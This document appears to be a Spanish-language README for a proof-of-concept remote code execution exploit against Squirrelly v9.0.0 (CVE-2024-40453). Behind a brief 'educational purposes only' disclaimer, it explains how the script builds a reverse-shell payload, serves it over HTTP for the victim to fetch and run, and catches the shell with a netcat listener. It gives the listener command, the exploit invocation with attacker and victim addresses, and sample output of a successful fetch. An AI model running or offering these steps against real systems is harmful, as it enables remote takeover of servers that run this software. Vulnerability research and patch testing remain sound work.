
CVE-2024-40453 - Squirrelly v9.0.0 RCE. Poc
Este script es solo para fines educativos.
No lo uses para fines ilegales.
Si lo haces, es completamente tu responsabilidad; no soy responsable de ningún mal uso.
Este script crea una reverse shell llamada payload.sh en el directorio actual.
Luego aloja un servidor http en el puerto 80 para que la víctima obtenga el payload.sh.
Se debe iniciar un listener en la máquina del atacante.
El servidor http se apaga después de 3 segundos para permitir que la víctima descargue y ejecute el payload.sh.
Basado en la siguiente información, se desarrolló este POC. https://samuzora.com/posts/cve-2024-40453
Inicia tu listener
rlwrap nc -nvlp 3000
Ejecuta el payload
# python3 poc.py -rhost <VICTIM_IP> -rport <VICTIM_PORT> -lhost <ATTACKER_IP> -lport <ATTACKER_LISTENER_PORT>
python3 poc.py -rhost 172.16.0.2 -rport 3000 -lhost 172.16.0.1 -lport 3000
[+] Payload created at payload.sh
[*] Hosting HTTP server on port 80
[*] Triggering remote execution
172.16.0.2 - - [13/Jun/2025 22:21:10] "GET /payload.sh HTTP/1.1" 200 -
[*] Shutting down HTTP server on port 80
[!] Check your listener!